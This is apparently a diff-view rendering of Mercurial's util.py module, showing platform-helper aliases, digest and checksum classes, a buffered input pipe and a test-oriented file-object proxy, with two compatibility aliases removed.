5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import itertools
25 import itertools
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import tempfile
34 import tempfile
35 import time
35 import time
36 import traceback
36 import traceback
37 import warnings
37 import warnings
38 import zlib
38 import zlib
39
39
40 from . import (
40 from . import (
41 encoding,
41 encoding,
42 error,
42 error,
43 i18n,
43 i18n,
44 node as nodemod,
44 node as nodemod,
45 policy,
45 policy,
46 pycompat,
46 pycompat,
47 urllibcompat,
47 urllibcompat,
48 )
48 )
49 from .utils import (
49 from .utils import (
50 dateutil,
50 dateutil,
51 procutil,
51 procutil,
52 stringutil,
52 stringutil,
53 )
53 )
54
54
55 base85 = policy.importmod(r'base85')
55 base85 = policy.importmod(r'base85')
56 osutil = policy.importmod(r'osutil')
56 osutil = policy.importmod(r'osutil')
57 parsers = policy.importmod(r'parsers')
57 parsers = policy.importmod(r'parsers')
58
58
59 b85decode = base85.b85decode
59 b85decode = base85.b85decode
60 b85encode = base85.b85encode
60 b85encode = base85.b85encode
61
61
62 cookielib = pycompat.cookielib
62 cookielib = pycompat.cookielib
63 empty = pycompat.empty
64 httplib = pycompat.httplib
63 httplib = pycompat.httplib
65 pickle = pycompat.pickle
64 pickle = pycompat.pickle
66 queue = pycompat.queue
67 safehasattr = pycompat.safehasattr
65 safehasattr = pycompat.safehasattr
68 socketserver = pycompat.socketserver
66 socketserver = pycompat.socketserver
69 bytesio = pycompat.bytesio
67 bytesio = pycompat.bytesio
70 # TODO deprecate stringio name, as it is a lie on Python 3.
68 # TODO deprecate stringio name, as it is a lie on Python 3.
71 stringio = bytesio
69 stringio = bytesio
72 xmlrpclib = pycompat.xmlrpclib
70 xmlrpclib = pycompat.xmlrpclib
73
71
74 httpserver = urllibcompat.httpserver
72 httpserver = urllibcompat.httpserver
75 urlerr = urllibcompat.urlerr
73 urlerr = urllibcompat.urlerr
76 urlreq = urllibcompat.urlreq
74 urlreq = urllibcompat.urlreq
77
75
78 # workaround for win32mbcs
76 # workaround for win32mbcs
79 _filenamebytestr = pycompat.bytestr
77 _filenamebytestr = pycompat.bytestr
80
78
81 if pycompat.iswindows:
79 if pycompat.iswindows:
82 from . import windows as platform
80 from . import windows as platform
83 else:
81 else:
84 from . import posix as platform
82 from . import posix as platform
85
83
86 _ = i18n._
84 _ = i18n._
87
85
88 bindunixsocket = platform.bindunixsocket
86 bindunixsocket = platform.bindunixsocket
89 cachestat = platform.cachestat
87 cachestat = platform.cachestat
90 checkexec = platform.checkexec
88 checkexec = platform.checkexec
91 checklink = platform.checklink
89 checklink = platform.checklink
92 copymode = platform.copymode
90 copymode = platform.copymode
93 expandglobs = platform.expandglobs
91 expandglobs = platform.expandglobs
94 getfsmountpoint = platform.getfsmountpoint
92 getfsmountpoint = platform.getfsmountpoint
95 getfstype = platform.getfstype
93 getfstype = platform.getfstype
96 groupmembers = platform.groupmembers
94 groupmembers = platform.groupmembers
97 groupname = platform.groupname
95 groupname = platform.groupname
98 isexec = platform.isexec
96 isexec = platform.isexec
99 isowner = platform.isowner
97 isowner = platform.isowner
100 listdir = osutil.listdir
98 listdir = osutil.listdir
101 localpath = platform.localpath
99 localpath = platform.localpath
102 lookupreg = platform.lookupreg
100 lookupreg = platform.lookupreg
103 makedir = platform.makedir
101 makedir = platform.makedir
104 nlinks = platform.nlinks
102 nlinks = platform.nlinks
105 normpath = platform.normpath
103 normpath = platform.normpath
106 normcase = platform.normcase
104 normcase = platform.normcase
107 normcasespec = platform.normcasespec
105 normcasespec = platform.normcasespec
108 normcasefallback = platform.normcasefallback
106 normcasefallback = platform.normcasefallback
109 openhardlinks = platform.openhardlinks
107 openhardlinks = platform.openhardlinks
110 oslink = platform.oslink
108 oslink = platform.oslink
111 parsepatchoutput = platform.parsepatchoutput
109 parsepatchoutput = platform.parsepatchoutput
112 pconvert = platform.pconvert
110 pconvert = platform.pconvert
113 poll = platform.poll
111 poll = platform.poll
114 posixfile = platform.posixfile
112 posixfile = platform.posixfile
115 rename = platform.rename
113 rename = platform.rename
116 removedirs = platform.removedirs
114 removedirs = platform.removedirs
117 samedevice = platform.samedevice
115 samedevice = platform.samedevice
118 samefile = platform.samefile
116 samefile = platform.samefile
119 samestat = platform.samestat
117 samestat = platform.samestat
120 setflags = platform.setflags
118 setflags = platform.setflags
121 split = platform.split
119 split = platform.split
122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
120 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 statisexec = platform.statisexec
121 statisexec = platform.statisexec
124 statislink = platform.statislink
122 statislink = platform.statislink
125 umask = platform.umask
123 umask = platform.umask
126 unlink = platform.unlink
124 unlink = platform.unlink
127 username = platform.username
125 username = platform.username
128
126
129 try:
127 try:
130 recvfds = osutil.recvfds
128 recvfds = osutil.recvfds
131 except AttributeError:
129 except AttributeError:
132 pass
130 pass
133
131
134 # Python compatibility
132 # Python compatibility
135
133
136 _notset = object()
134 _notset = object()
137
135
138 def _rapply(f, xs):
136 def _rapply(f, xs):
139 if xs is None:
137 if xs is None:
140 # assume None means non-value of optional data
138 # assume None means non-value of optional data
141 return xs
139 return xs
142 if isinstance(xs, (list, set, tuple)):
140 if isinstance(xs, (list, set, tuple)):
143 return type(xs)(_rapply(f, x) for x in xs)
141 return type(xs)(_rapply(f, x) for x in xs)
144 if isinstance(xs, dict):
142 if isinstance(xs, dict):
145 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
143 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
146 return f(xs)
144 return f(xs)
147
145
148 def rapply(f, xs):
146 def rapply(f, xs):
149 """Apply function recursively to every item preserving the data structure
147 """Apply function recursively to every item preserving the data structure
150
148
151 >>> def f(x):
149 >>> def f(x):
152 ... return 'f(%s)' % x
150 ... return 'f(%s)' % x
153 >>> rapply(f, None) is None
151 >>> rapply(f, None) is None
154 True
152 True
155 >>> rapply(f, 'a')
153 >>> rapply(f, 'a')
156 'f(a)'
154 'f(a)'
157 >>> rapply(f, {'a'}) == {'f(a)'}
155 >>> rapply(f, {'a'}) == {'f(a)'}
158 True
156 True
159 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
157 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
160 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
158 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
161
159
162 >>> xs = [object()]
160 >>> xs = [object()]
163 >>> rapply(pycompat.identity, xs) is xs
161 >>> rapply(pycompat.identity, xs) is xs
164 True
162 True
165 """
163 """
166 if f is pycompat.identity:
164 if f is pycompat.identity:
167 # fast path mainly for py2
165 # fast path mainly for py2
168 return xs
166 return xs
169 return _rapply(f, xs)
167 return _rapply(f, xs)
170
168
171 def bitsfrom(container):
169 def bitsfrom(container):
172 bits = 0
170 bits = 0
173 for bit in container:
171 for bit in container:
174 bits |= bit
172 bits |= bit
175 return bits
173 return bits
176
174
177 # python 2.6 still have deprecation warning enabled by default. We do not want
175 # python 2.6 still have deprecation warning enabled by default. We do not want
178 # to display anything to standard user so detect if we are running test and
176 # to display anything to standard user so detect if we are running test and
179 # only use python deprecation warning in this case.
177 # only use python deprecation warning in this case.
180 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
178 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
181 if _dowarn:
179 if _dowarn:
182 # explicitly unfilter our warning for python 2.7
180 # explicitly unfilter our warning for python 2.7
183 #
181 #
184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
182 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 # However, module name set through PYTHONWARNINGS was exactly matched, so
183 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
184 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
185 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
186 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
189 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
187 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
190 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
188 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
191 if _dowarn and pycompat.ispy3:
189 if _dowarn and pycompat.ispy3:
192 # silence warning emitted by passing user string to re.sub()
190 # silence warning emitted by passing user string to re.sub()
193 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
191 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
194 r'mercurial')
192 r'mercurial')
195 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
193 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
196 DeprecationWarning, r'mercurial')
194 DeprecationWarning, r'mercurial')
197 # TODO: reinvent imp.is_frozen()
195 # TODO: reinvent imp.is_frozen()
198 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
196 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
199 DeprecationWarning, r'mercurial')
197 DeprecationWarning, r'mercurial')
200
198
201 def nouideprecwarn(msg, version, stacklevel=1):
199 def nouideprecwarn(msg, version, stacklevel=1):
202 """Issue an python native deprecation warning
200 """Issue an python native deprecation warning
203
201
204 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
202 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
205 """
203 """
206 if _dowarn:
204 if _dowarn:
207 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
205 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
208 " update your code.)") % version
206 " update your code.)") % version
209 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
207 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
210
208
211 DIGESTS = {
209 DIGESTS = {
212 'md5': hashlib.md5,
210 'md5': hashlib.md5,
213 'sha1': hashlib.sha1,
211 'sha1': hashlib.sha1,
214 'sha512': hashlib.sha512,
212 'sha512': hashlib.sha512,
215 }
213 }
216 # List of digest types from strongest to weakest
214 # List of digest types from strongest to weakest
217 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
215 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
218
216
219 for k in DIGESTS_BY_STRENGTH:
217 for k in DIGESTS_BY_STRENGTH:
220 assert k in DIGESTS
218 assert k in DIGESTS
221
219
222 class digester(object):
220 class digester(object):
223 """helper to compute digests.
221 """helper to compute digests.
224
222
225 This helper can be used to compute one or more digests given their name.
223 This helper can be used to compute one or more digests given their name.
226
224
227 >>> d = digester([b'md5', b'sha1'])
225 >>> d = digester([b'md5', b'sha1'])
228 >>> d.update(b'foo')
226 >>> d.update(b'foo')
229 >>> [k for k in sorted(d)]
227 >>> [k for k in sorted(d)]
230 ['md5', 'sha1']
228 ['md5', 'sha1']
231 >>> d[b'md5']
229 >>> d[b'md5']
232 'acbd18db4cc2f85cedef654fccc4a4d8'
230 'acbd18db4cc2f85cedef654fccc4a4d8'
233 >>> d[b'sha1']
231 >>> d[b'sha1']
234 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
232 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
235 >>> digester.preferred([b'md5', b'sha1'])
233 >>> digester.preferred([b'md5', b'sha1'])
236 'sha1'
234 'sha1'
237 """
235 """
238
236
239 def __init__(self, digests, s=''):
237 def __init__(self, digests, s=''):
240 self._hashes = {}
238 self._hashes = {}
241 for k in digests:
239 for k in digests:
242 if k not in DIGESTS:
240 if k not in DIGESTS:
243 raise error.Abort(_('unknown digest type: %s') % k)
241 raise error.Abort(_('unknown digest type: %s') % k)
244 self._hashes[k] = DIGESTS[k]()
242 self._hashes[k] = DIGESTS[k]()
245 if s:
243 if s:
246 self.update(s)
244 self.update(s)
247
245
248 def update(self, data):
246 def update(self, data):
249 for h in self._hashes.values():
247 for h in self._hashes.values():
250 h.update(data)
248 h.update(data)
251
249
252 def __getitem__(self, key):
250 def __getitem__(self, key):
253 if key not in DIGESTS:
251 if key not in DIGESTS:
254 raise error.Abort(_('unknown digest type: %s') % k)
252 raise error.Abort(_('unknown digest type: %s') % k)
255 return nodemod.hex(self._hashes[key].digest())
253 return nodemod.hex(self._hashes[key].digest())
256
254
257 def __iter__(self):
255 def __iter__(self):
258 return iter(self._hashes)
256 return iter(self._hashes)
259
257
260 @staticmethod
258 @staticmethod
261 def preferred(supported):
259 def preferred(supported):
262 """returns the strongest digest type in both supported and DIGESTS."""
260 """returns the strongest digest type in both supported and DIGESTS."""
263
261
264 for k in DIGESTS_BY_STRENGTH:
262 for k in DIGESTS_BY_STRENGTH:
265 if k in supported:
263 if k in supported:
266 return k
264 return k
267 return None
265 return None
268
266
269 class digestchecker(object):
267 class digestchecker(object):
270 """file handle wrapper that additionally checks content against a given
268 """file handle wrapper that additionally checks content against a given
271 size and digests.
269 size and digests.
272
270
273 d = digestchecker(fh, size, {'md5': '...'})
271 d = digestchecker(fh, size, {'md5': '...'})
274
272
275 When multiple digests are given, all of them are validated.
273 When multiple digests are given, all of them are validated.
276 """
274 """
277
275
278 def __init__(self, fh, size, digests):
276 def __init__(self, fh, size, digests):
279 self._fh = fh
277 self._fh = fh
280 self._size = size
278 self._size = size
281 self._got = 0
279 self._got = 0
282 self._digests = dict(digests)
280 self._digests = dict(digests)
283 self._digester = digester(self._digests.keys())
281 self._digester = digester(self._digests.keys())
284
282
285 def read(self, length=-1):
283 def read(self, length=-1):
286 content = self._fh.read(length)
284 content = self._fh.read(length)
287 self._digester.update(content)
285 self._digester.update(content)
288 self._got += len(content)
286 self._got += len(content)
289 return content
287 return content
290
288
291 def validate(self):
289 def validate(self):
292 if self._size != self._got:
290 if self._size != self._got:
293 raise error.Abort(_('size mismatch: expected %d, got %d') %
291 raise error.Abort(_('size mismatch: expected %d, got %d') %
294 (self._size, self._got))
292 (self._size, self._got))
295 for k, v in self._digests.items():
293 for k, v in self._digests.items():
296 if v != self._digester[k]:
294 if v != self._digester[k]:
297 # i18n: first parameter is a digest name
295 # i18n: first parameter is a digest name
298 raise error.Abort(_('%s mismatch: expected %s, got %s') %
296 raise error.Abort(_('%s mismatch: expected %s, got %s') %
299 (k, v, self._digester[k]))
297 (k, v, self._digester[k]))
300
298
301 try:
299 try:
302 buffer = buffer
300 buffer = buffer
303 except NameError:
301 except NameError:
304 def buffer(sliceable, offset=0, length=None):
302 def buffer(sliceable, offset=0, length=None):
305 if length is not None:
303 if length is not None:
306 return memoryview(sliceable)[offset:offset + length]
304 return memoryview(sliceable)[offset:offset + length]
307 return memoryview(sliceable)[offset:]
305 return memoryview(sliceable)[offset:]
308
306
309 _chunksize = 4096
307 _chunksize = 4096
310
308
311 class bufferedinputpipe(object):
309 class bufferedinputpipe(object):
312 """a manually buffered input pipe
310 """a manually buffered input pipe
313
311
314 Python will not let us use buffered IO and lazy reading with 'polling' at
312 Python will not let us use buffered IO and lazy reading with 'polling' at
315 the same time. We cannot probe the buffer state and select will not detect
313 the same time. We cannot probe the buffer state and select will not detect
316 that data are ready to read if they are already buffered.
314 that data are ready to read if they are already buffered.
317
315
318 This class let us work around that by implementing its own buffering
316 This class let us work around that by implementing its own buffering
319 (allowing efficient readline) while offering a way to know if the buffer is
317 (allowing efficient readline) while offering a way to know if the buffer is
320 empty from the output (allowing collaboration of the buffer with polling).
318 empty from the output (allowing collaboration of the buffer with polling).
321
319
322 This class lives in the 'util' module because it makes use of the 'os'
320 This class lives in the 'util' module because it makes use of the 'os'
323 module from the python stdlib.
321 module from the python stdlib.
324 """
322 """
325 def __new__(cls, fh):
323 def __new__(cls, fh):
326 # If we receive a fileobjectproxy, we need to use a variation of this
324 # If we receive a fileobjectproxy, we need to use a variation of this
327 # class that notifies observers about activity.
325 # class that notifies observers about activity.
328 if isinstance(fh, fileobjectproxy):
326 if isinstance(fh, fileobjectproxy):
329 cls = observedbufferedinputpipe
327 cls = observedbufferedinputpipe
330
328
331 return super(bufferedinputpipe, cls).__new__(cls)
329 return super(bufferedinputpipe, cls).__new__(cls)
332
330
333 def __init__(self, input):
331 def __init__(self, input):
334 self._input = input
332 self._input = input
335 self._buffer = []
333 self._buffer = []
336 self._eof = False
334 self._eof = False
337 self._lenbuf = 0
335 self._lenbuf = 0
338
336
339 @property
337 @property
340 def hasbuffer(self):
338 def hasbuffer(self):
341 """True is any data is currently buffered
339 """True is any data is currently buffered
342
340
343 This will be used externally a pre-step for polling IO. If there is
341 This will be used externally a pre-step for polling IO. If there is
344 already data then no polling should be set in place."""
342 already data then no polling should be set in place."""
345 return bool(self._buffer)
343 return bool(self._buffer)
346
344
347 @property
345 @property
348 def closed(self):
346 def closed(self):
349 return self._input.closed
347 return self._input.closed
350
348
351 def fileno(self):
349 def fileno(self):
352 return self._input.fileno()
350 return self._input.fileno()
353
351
354 def close(self):
352 def close(self):
355 return self._input.close()
353 return self._input.close()
356
354
357 def read(self, size):
355 def read(self, size):
358 while (not self._eof) and (self._lenbuf < size):
356 while (not self._eof) and (self._lenbuf < size):
359 self._fillbuffer()
357 self._fillbuffer()
360 return self._frombuffer(size)
358 return self._frombuffer(size)
361
359
362 def readline(self, *args, **kwargs):
360 def readline(self, *args, **kwargs):
363 if 1 < len(self._buffer):
361 if 1 < len(self._buffer):
364 # this should not happen because both read and readline end with a
362 # this should not happen because both read and readline end with a
365 # _frombuffer call that collapse it.
363 # _frombuffer call that collapse it.
366 self._buffer = [''.join(self._buffer)]
364 self._buffer = [''.join(self._buffer)]
367 self._lenbuf = len(self._buffer[0])
365 self._lenbuf = len(self._buffer[0])
368 lfi = -1
366 lfi = -1
369 if self._buffer:
367 if self._buffer:
370 lfi = self._buffer[-1].find('\n')
368 lfi = self._buffer[-1].find('\n')
371 while (not self._eof) and lfi < 0:
369 while (not self._eof) and lfi < 0:
372 self._fillbuffer()
370 self._fillbuffer()
373 if self._buffer:
371 if self._buffer:
374 lfi = self._buffer[-1].find('\n')
372 lfi = self._buffer[-1].find('\n')
375 size = lfi + 1
373 size = lfi + 1
376 if lfi < 0: # end of file
374 if lfi < 0: # end of file
377 size = self._lenbuf
375 size = self._lenbuf
378 elif 1 < len(self._buffer):
376 elif 1 < len(self._buffer):
379 # we need to take previous chunks into account
377 # we need to take previous chunks into account
380 size += self._lenbuf - len(self._buffer[-1])
378 size += self._lenbuf - len(self._buffer[-1])
381 return self._frombuffer(size)
379 return self._frombuffer(size)
382
380
383 def _frombuffer(self, size):
381 def _frombuffer(self, size):
384 """return at most 'size' data from the buffer
382 """return at most 'size' data from the buffer
385
383
386 The data are removed from the buffer."""
384 The data are removed from the buffer."""
387 if size == 0 or not self._buffer:
385 if size == 0 or not self._buffer:
388 return ''
386 return ''
389 buf = self._buffer[0]
387 buf = self._buffer[0]
390 if 1 < len(self._buffer):
388 if 1 < len(self._buffer):
391 buf = ''.join(self._buffer)
389 buf = ''.join(self._buffer)
392
390
393 data = buf[:size]
391 data = buf[:size]
394 buf = buf[len(data):]
392 buf = buf[len(data):]
395 if buf:
393 if buf:
396 self._buffer = [buf]
394 self._buffer = [buf]
397 self._lenbuf = len(buf)
395 self._lenbuf = len(buf)
398 else:
396 else:
399 self._buffer = []
397 self._buffer = []
400 self._lenbuf = 0
398 self._lenbuf = 0
401 return data
399 return data
402
400
403 def _fillbuffer(self):
401 def _fillbuffer(self):
404 """read data to the buffer"""
402 """read data to the buffer"""
405 data = os.read(self._input.fileno(), _chunksize)
403 data = os.read(self._input.fileno(), _chunksize)
406 if not data:
404 if not data:
407 self._eof = True
405 self._eof = True
408 else:
406 else:
409 self._lenbuf += len(data)
407 self._lenbuf += len(data)
410 self._buffer.append(data)
408 self._buffer.append(data)
411
409
412 return data
410 return data
413
411
414 def mmapread(fp):
412 def mmapread(fp):
415 try:
413 try:
416 fd = getattr(fp, 'fileno', lambda: fp)()
414 fd = getattr(fp, 'fileno', lambda: fp)()
417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
415 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
418 except ValueError:
416 except ValueError:
419 # Empty files cannot be mmapped, but mmapread should still work. Check
417 # Empty files cannot be mmapped, but mmapread should still work. Check
420 # if the file is empty, and if so, return an empty buffer.
418 # if the file is empty, and if so, return an empty buffer.
421 if os.fstat(fd).st_size == 0:
419 if os.fstat(fd).st_size == 0:
422 return ''
420 return ''
423 raise
421 raise
424
422
425 class fileobjectproxy(object):
423 class fileobjectproxy(object):
426 """A proxy around file objects that tells a watcher when events occur.
424 """A proxy around file objects that tells a watcher when events occur.
427
425
428 This type is intended to only be used for testing purposes. Think hard
426 This type is intended to only be used for testing purposes. Think hard
429 before using it in important code.
427 before using it in important code.
430 """
428 """
431 __slots__ = (
429 __slots__ = (
432 r'_orig',
430 r'_orig',
433 r'_observer',
431 r'_observer',
434 )
432 )
435
433
436 def __init__(self, fh, observer):
434 def __init__(self, fh, observer):
437 object.__setattr__(self, r'_orig', fh)
435 object.__setattr__(self, r'_orig', fh)
438 object.__setattr__(self, r'_observer', observer)
436 object.__setattr__(self, r'_observer', observer)
439
437
440 def __getattribute__(self, name):
438 def __getattribute__(self, name):
441 ours = {
439 ours = {
442 r'_observer',
440 r'_observer',
443
441
444 # IOBase
442 # IOBase
445 r'close',
443 r'close',
446 # closed if a property
444 # closed if a property
447 r'fileno',
445 r'fileno',
448 r'flush',
446 r'flush',
449 r'isatty',
447 r'isatty',
450 r'readable',
448 r'readable',
451 r'readline',
449 r'readline',
452 r'readlines',
450 r'readlines',
453 r'seek',
451 r'seek',
454 r'seekable',
452 r'seekable',
455 r'tell',
453 r'tell',
456 r'truncate',
454 r'truncate',
457 r'writable',
455 r'writable',
458 r'writelines',
456 r'writelines',
459 # RawIOBase
457 # RawIOBase
460 r'read',
458 r'read',
461 r'readall',
459 r'readall',
462 r'readinto',
460 r'readinto',
463 r'write',
461 r'write',
464 # BufferedIOBase
462 # BufferedIOBase
465 # raw is a property
463 # raw is a property
466 r'detach',
464 r'detach',
467 # read defined above
465 # read defined above
468 r'read1',
466 r'read1',
469 # readinto defined above
467 # readinto defined above
470 # write defined above
468 # write defined above
471 }
469 }
472
470
473 # We only observe some methods.
471 # We only observe some methods.
474 if name in ours:
472 if name in ours:
475 return object.__getattribute__(self, name)
473 return object.__getattribute__(self, name)
476
474
477 return getattr(object.__getattribute__(self, r'_orig'), name)
475 return getattr(object.__getattribute__(self, r'_orig'), name)
478
476
479 def __nonzero__(self):
477 def __nonzero__(self):
480 return bool(object.__getattribute__(self, r'_orig'))
478 return bool(object.__getattribute__(self, r'_orig'))
481
479
482 __bool__ = __nonzero__
480 __bool__ = __nonzero__
483
481
484 def __delattr__(self, name):
482 def __delattr__(self, name):
485 return delattr(object.__getattribute__(self, r'_orig'), name)
483 return delattr(object.__getattribute__(self, r'_orig'), name)
486
484
487 def __setattr__(self, name, value):
485 def __setattr__(self, name, value):
488 return setattr(object.__getattribute__(self, r'_orig'), name, value)
486 return setattr(object.__getattribute__(self, r'_orig'), name, value)
489
487
490 def __iter__(self):
488 def __iter__(self):
491 return object.__getattribute__(self, r'_orig').__iter__()
489 return object.__getattribute__(self, r'_orig').__iter__()
492
490
493 def _observedcall(self, name, *args, **kwargs):
491 def _observedcall(self, name, *args, **kwargs):
494 # Call the original object.
492 # Call the original object.
495 orig = object.__getattribute__(self, r'_orig')
493 orig = object.__getattribute__(self, r'_orig')
496 res = getattr(orig, name)(*args, **kwargs)
494 res = getattr(orig, name)(*args, **kwargs)
497
495
498 # Call a method on the observer of the same name with arguments
496 # Call a method on the observer of the same name with arguments
499 # so it can react, log, etc.
497 # so it can react, log, etc.
500 observer = object.__getattribute__(self, r'_observer')
498 observer = object.__getattribute__(self, r'_observer')
501 fn = getattr(observer, name, None)
499 fn = getattr(observer, name, None)
502 if fn:
500 if fn:
503 fn(res, *args, **kwargs)
501 fn(res, *args, **kwargs)
504
502
505 return res
503 return res
506
504
507 def close(self, *args, **kwargs):
505 def close(self, *args, **kwargs):
508 return object.__getattribute__(self, r'_observedcall')(
506 return object.__getattribute__(self, r'_observedcall')(
509 r'close', *args, **kwargs)
507 r'close', *args, **kwargs)
510
508
511 def fileno(self, *args, **kwargs):
509 def fileno(self, *args, **kwargs):
512 return object.__getattribute__(self, r'_observedcall')(
510 return object.__getattribute__(self, r'_observedcall')(
513 r'fileno', *args, **kwargs)
511 r'fileno', *args, **kwargs)
514
512
515 def flush(self, *args, **kwargs):
513 def flush(self, *args, **kwargs):
516 return object.__getattribute__(self, r'_observedcall')(
514 return object.__getattribute__(self, r'_observedcall')(
517 r'flush', *args, **kwargs)
515 r'flush', *args, **kwargs)
518
516
519 def isatty(self, *args, **kwargs):
517 def isatty(self, *args, **kwargs):
520 return object.__getattribute__(self, r'_observedcall')(
518 return object.__getattribute__(self, r'_observedcall')(
521 r'isatty', *args, **kwargs)
519 r'isatty', *args, **kwargs)
522
520
523 def readable(self, *args, **kwargs):
521 def readable(self, *args, **kwargs):
524 return object.__getattribute__(self, r'_observedcall')(
522 return object.__getattribute__(self, r'_observedcall')(
525 r'readable', *args, **kwargs)
523 r'readable', *args, **kwargs)
526
524
527 def readline(self, *args, **kwargs):
525 def readline(self, *args, **kwargs):
528 return object.__getattribute__(self, r'_observedcall')(
526 return object.__getattribute__(self, r'_observedcall')(
529 r'readline', *args, **kwargs)
527 r'readline', *args, **kwargs)
530
528
531 def readlines(self, *args, **kwargs):
529 def readlines(self, *args, **kwargs):
532 return object.__getattribute__(self, r'_observedcall')(
530 return object.__getattribute__(self, r'_observedcall')(
533 r'readlines', *args, **kwargs)
531 r'readlines', *args, **kwargs)
534
532
535 def seek(self, *args, **kwargs):
533 def seek(self, *args, **kwargs):
536 return object.__getattribute__(self, r'_observedcall')(
534 return object.__getattribute__(self, r'_observedcall')(
537 r'seek', *args, **kwargs)
535 r'seek', *args, **kwargs)
538
536
539 def seekable(self, *args, **kwargs):
537 def seekable(self, *args, **kwargs):
540 return object.__getattribute__(self, r'_observedcall')(
538 return object.__getattribute__(self, r'_observedcall')(
541 r'seekable', *args, **kwargs)
539 r'seekable', *args, **kwargs)
542
540
543 def tell(self, *args, **kwargs):
541 def tell(self, *args, **kwargs):
544 return object.__getattribute__(self, r'_observedcall')(
542 return object.__getattribute__(self, r'_observedcall')(
545 r'tell', *args, **kwargs)
543 r'tell', *args, **kwargs)
546
544
547 def truncate(self, *args, **kwargs):
545 def truncate(self, *args, **kwargs):
548 return object.__getattribute__(self, r'_observedcall')(
546 return object.__getattribute__(self, r'_observedcall')(
549 r'truncate', *args, **kwargs)
547 r'truncate', *args, **kwargs)
550
548
551 def writable(self, *args, **kwargs):
549 def writable(self, *args, **kwargs):
552 return object.__getattribute__(self, r'_observedcall')(
550 return object.__getattribute__(self, r'_observedcall')(
553 r'writable', *args, **kwargs)
551 r'writable', *args, **kwargs)
554
552
555 def writelines(self, *args, **kwargs):
553 def writelines(self, *args, **kwargs):
556 return object.__getattribute__(self, r'_observedcall')(
554 return object.__getattribute__(self, r'_observedcall')(
557 r'writelines', *args, **kwargs)
555 r'writelines', *args, **kwargs)
558
556
559 def read(self, *args, **kwargs):
557 def read(self, *args, **kwargs):
560 return object.__getattribute__(self, r'_observedcall')(
558 return object.__getattribute__(self, r'_observedcall')(
561 r'read', *args, **kwargs)
559 r'read', *args, **kwargs)
562
560
563 def readall(self, *args, **kwargs):
561 def readall(self, *args, **kwargs):
564 return object.__getattribute__(self, r'_observedcall')(
562 return object.__getattribute__(self, r'_observedcall')(
565 r'readall', *args, **kwargs)
563 r'readall', *args, **kwargs)
566
564
567 def readinto(self, *args, **kwargs):
565 def readinto(self, *args, **kwargs):
568 return object.__getattribute__(self, r'_observedcall')(
566 return object.__getattribute__(self, r'_observedcall')(
569 r'readinto', *args, **kwargs)
567 r'readinto', *args, **kwargs)
570
568
571 def write(self, *args, **kwargs):
569 def write(self, *args, **kwargs):
572 return object.__getattribute__(self, r'_observedcall')(
570 return object.__getattribute__(self, r'_observedcall')(
573 r'write', *args, **kwargs)
571 r'write', *args, **kwargs)
574
572
575 def detach(self, *args, **kwargs):
573 def detach(self, *args, **kwargs):
576 return object.__getattribute__(self, r'_observedcall')(
574 return object.__getattribute__(self, r'_observedcall')(
577 r'detach', *args, **kwargs)
575 r'detach', *args, **kwargs)
578
576
579 def read1(self, *args, **kwargs):
577 def read1(self, *args, **kwargs):
580 return object.__getattribute__(self, r'_observedcall')(
578 return object.__getattribute__(self, r'_observedcall')(
581 r'read1', *args, **kwargs)
579 r'read1', *args, **kwargs)
582
580
